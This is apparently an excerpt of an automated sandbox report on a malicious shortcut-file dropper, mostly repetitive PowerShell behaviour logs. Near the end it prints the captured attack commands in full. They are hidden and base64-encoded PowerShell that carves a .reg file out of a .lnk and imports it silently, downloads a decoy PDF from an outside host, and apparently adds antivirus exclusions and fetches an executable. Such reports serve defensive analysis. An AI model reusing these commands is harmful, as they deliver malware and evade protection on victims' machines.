Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\regedit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3347Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2139Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4394Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5015Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7712Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: svchost.exe, 00000007.00000002.3021543981.000002A8ED854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3020152200.000002A8E822B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: unknownProcess created: Base64 decoded +^NZ*.65E^hs'5}z^=ao+^{WzWyR*xMDx>zWjkz+{jZijjru
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded +^NZ*.65E^hs'5}z^=ao+^{WzWyR*xMDx>zWjkz+{jZijjru
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded +^NZ*.65E^hs'5}z^=ao+^{WzWyR*xMDx>zWjkz+{jZijjruJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdfJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -c "& {$currentpath = (get-location).path; start-process powershell -windowstyle hidden -verb runas -argumentlist ('-command set-location -path ''\"' + $currentpath + '\"'' ;$dirpath = get-location;set-location -path ''\"' + $dirpath.path + '\"'' ;$lnkpaths = get-childitem -path ''\"' + $dirpath.path + '\"'' -recurse *.lnk | where-object { $_.length -eq 423781 } | select-object -expandproperty fullname;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exefile = get-content $lnkpath -encoding byte -totalcount 423781 -readcount 423781;$exepath = join-path $env:public ''17399.reg'';set-content $exepath ([byte[]]($exefile | select-object -skip 4901)) -encoding byte;start-process -filepath ''regedit'' -argumentlist ''/s'', $exepath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:temp + ''\document.pdf'';invoke-webrequest -uri $a -outfile $d; invoke-item $d')}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command set-location -path '"c:\users\user\desktop"' ;$dirpath = get-location;set-location -path '""' ;$lnkpaths = get-childitem -path '""' -recurse *.lnk | where-object { $_.length -eq 423781 } | select-object -expandproperty fullname;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exefile = get-content $lnkpath -encoding byte -totalcount 423781 -readcount 423781;$exepath = join-path $env:public '17399.reg';set-content $exepath ([byte[]]($exefile | select-object -skip 4901)) -encoding byte;start-process -filepath 'regedit' -argumentlist '/s', $exepath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:temp + '\document.pdf';invoke-webrequest -uri $a -outfile $d; invoke-item $d
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -e jabjahuacgbyaguabgb0aeqacgbpahyazqagad0aiaaoaecazqb0ac0atabvagmayqb0agkabwbuacaafaagafmacabsagkadaatafaayqb0aggaiaatafeadqbhagwaaqbmagkazqbyackaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -e jabhad0ajwboahqadabwadoalwavahiayqb3ac4azwbpahqaaab1agiadqbzaguacgbjag8abgb0aguabgb0ac4aywbvag0alwbnahkauabyagkabgbjaguacwbzaeeaawbpahiayqavaeoayqbyahyayqbzac8abqbhagkabgavaeeabablagoalgblahgazqanadsajabkad0aigakacgajablag4adga6afqarqb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command set-location -path '"c:\users\user\desktop"' ;$dirpath = get-location;set-location -path '""' ;$lnkpaths = get-childitem -path '""' -recurse *.lnk | where-object { $_.length -eq 423781 } | select-object -expandproperty fullname;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exefile = get-content $lnkpath -encoding byte -totalcount 423781 -readcount 423781;$exepath = join-path $env:public '17399.reg';set-content $exepath ([byte[]]($exefile | select-object -skip 4901)) -encoding byte;start-process -filepath 'regedit' -argumentlist '/s', $exepath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:temp + '\document.pdf';invoke-webrequest -uri $a -outfile $d; invoke-item $d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
